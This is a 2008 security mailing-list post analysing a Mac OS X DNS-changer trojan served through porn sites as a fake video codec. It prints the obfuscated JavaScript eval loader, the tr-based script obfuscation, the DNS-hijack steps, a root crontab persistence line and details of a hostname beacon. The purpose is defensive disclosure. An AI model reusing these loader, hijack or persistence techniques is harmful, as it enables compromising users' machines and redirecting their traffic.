[nsp-sec] [ OT ] MacOS X malware

Rob Thomas robt at cymru.com
Wed Apr 2 15:07:07 EDT 2008 

Hi, team.

Given the large number of Mac users in this community, and given that 
this collection of dodgy web sites are infecting Windows and MacOS X, I 
thought this was reasonably appropriate for this list.  Some folks on 
this list might want to take action against some of these IPs.

Yes it's true - there is malware for the MacOS X platform.  While this
report will cover a recent release, the malware itself isn't new and
hacking MacOS X isn't new, either.

You can read a public blog post and some useful follow-ups at the
following URL:

    <http://tacit.livejournal.com/238112.html>

Here is our analysis.  Some of these links are rude even in name, and
all of them are unsafe.

The fun begins with at least one porn site.  The site brings the user
through a few redirects to a site here:

    88.85.72.147

    AS      | IP               | BGP Prefix          | CC | Registry |
Allocated  | AS Name
    35415   | 88.85.72.147     | 88.85.64.0/19       | NL | ripencc  |
2006-02-08 | WEBAZILLA WebaZilla European Network

The page there loads some fun Javascript:

    var str=["332", "331", "331", "331", "440", "419", "436",
    "354", "434", "433", "440", "383", "370", "381", "332",
    "331", "331", "331", "424", "439", "432", "421", "438",
    "427", "433", "432", "354", "443", "441", "439", "427",
    "422", "420", "430", "444", "433", "427", "362", "435",
    "439", "423", "436", "443", "363", "445", "332", "331",
    "331", "331", "331", "441", "427", "432", "422", "433",
    "441", "368", "430", "433", "421", "419", "438", "427",
    "433", "432", "383", "361", "426", "438", "438", "434",
    "380", "369", "369", "430", "419", "432", "422", "427",
    "432", "425", "426", "419", "430", "430", "368", "421",
    "433", "431", "369", "427", "432", "368", "421", "425",
    "427", "385", "373", "361", "381", "332", "331", "331",
    "331", "447"];
    var temp='';
    var gg='';
    for (i=0; i<str.length; i++){
       gg=str[i]-322;
       temp=temp+String.fromCharCode(gg);
    }
    eval(temp);

This translates to (I've heavily obfuscated the URL below):

    var pov=0;
    function ywuidblzoi(query){
       window.location='h x x p : / / landinghall . com / in.cgi?3';
    }

The host landinghall.com resolves to 88.214.202.180, located at the
following provider:

    AS      | IP               | BGP Prefix          | CC | Registry |
Allocated  | AS Name
    23393   | 88.214.202.180   | 88.214.192.0/18     | GB | ripencc  |
2006-01-18 | ISPRIME - ISPrime, Inc.

In addition to the malware, the images are extremely graphic.  Consider 
yourself warned.

The web site determines the visitor's OS and then decides which malware
to offer.  This is masked as a video codec to play the porn
available on this "PornTube" (their name) site.

Note well that if the browser has pop-ups blocked, there is no risk to
MacOS X users so far as we can discern.

At this point the MacOS X user is prompted to download a disk image for
installation.  This image is named 1023.dmg and is served from:

    64.28.178.27, 64-28-178-27-rev.cernel.net

    AS      | IP               | BGP Prefix          | CC | Registry |
Allocated  | AS Name
    27595   | 64.28.178.27     | 64.28.176.0/20      | US | arin     |
2005-12-29 | INTERCAGE - InterCage, Inc.

The MacOS X user *must* provide his or her password to enable the
installation of this malware masked as a video player.  This is not a
0day attack - it is social engineering.

The preinstall and preupgrade scripts are the same and contain 25 lines.
Both use an interesting obfuscation technique - the Unix tr(1) command.

The script first cat(1)'s itself and pipes bottom 23 lines of itself
through tr(1).  The first tr(1) round does the following (I've cleaned
this up a bit to make it more legible):

    tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv > 1

It next sets two variables:

    s1 = cx.zxx.aas.xd
    s2 = cx.zxx.aaz.ace

The script called "1" is now run with these two variables as arguments,
piped through tr(1) again (line split to make it more legible):

    sh 1 `echo $s1|tr qazwsxedcr 0123456789` \
    `echo $s2| tr qazwsxedcr 0123456789`

The tr(1) command translates those two "strings" into the following two
IP addresses:

    s1 = 85.255.114.57
    s2 = 85.255.112.186

Those IPs belong to:

    AS      | IP               | BGP Prefix          | CC | Registry |
Allocated  | AS Name
    27595   | 85.255.114.57    | 85.255.114.0/23     | UA | ripencc  |
2005-06-16 | INTERCAGE - InterCage, Inc.

    AS      | IP               | BGP Prefix          | CC | Registry |
Allocated  | AS Name
    36445   | 85.255.112.186   | 85.255.112.0/24     | UA | ripencc  |
2005-06-16 | CERNEL-ASN - Cernel, Inc

The script called "1" looks for some basic IPv4 settings on the Mac.
It then replaces the DNS name servers in the netinfo database with
85.255.114.57 and 85.255.112.186.  Any DNS queries from the compromised
Mac are now sent to these two name servers.

Both 85.255.114.57 and 85.255.112.186 are open to recursion, of course.

These IPs are no stranger to badness.  We count 17 distinct samples in
our malware menagerie that reference 85.255.114.57.  The host at
85.255.112.186 has been involved with at least 60 malware samples that
hijack DNS settings.

If a query is made for a non-existant DNS RR, these DNS name servers
return an answer of 64.28.185.108.

    64.28.185.108, 64-28-185-108-rev.cernel.net

    AS      | IP               | BGP Prefix          | CC | Registry |
Allocated  | AS Name
    27595   | 64.28.185.108    | 64.28.176.0/20      | US | arin     |
2005-12-29 | INTERCAGE - InterCage, Inc.

The script then installs itself into root's crontab as:

    * * * * * /Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1"

By default there is no root crontab on MacOS X, so this one really
stands out.

The QuickTime.xpt script is just a copy of the "1" script.  This will
now run once per minute, as root, ensuring the malware and the DNS
changes aren't removed or lost for long.

A Perl script named "sendreq" is run and deleted.  This script is a
beacon, sending the output of "uname -p" (the machine processor
architecture name, e.g. "i386") and the hostname(1) command to a web
server.  The web server is:

    64.28.188.220, 64-28-188-220-rev.cernel.net

    AS      | IP               | BGP Prefix          | CC | Registry |
Allocated  | AS Name
    27595   | 64.28.188.220    | 64.28.176.0/20      | US | arin     |
2005-12-29 | INTERCAGE - InterCage, Inc.

This is done as a HTTP GET command from the compromised Mac, with the
Accept-Language: field set to the information obtained from the
uname(1) and hostname(1) commands run on the compromised Mac.

We see at least 227 victims, mostly in the US.

Thanks,
Rob.
-- 
Rob Thomas
Team Cymru
The WHO and WHY team
http://www.team-cymru.org/

More information about the nsp-security mailing list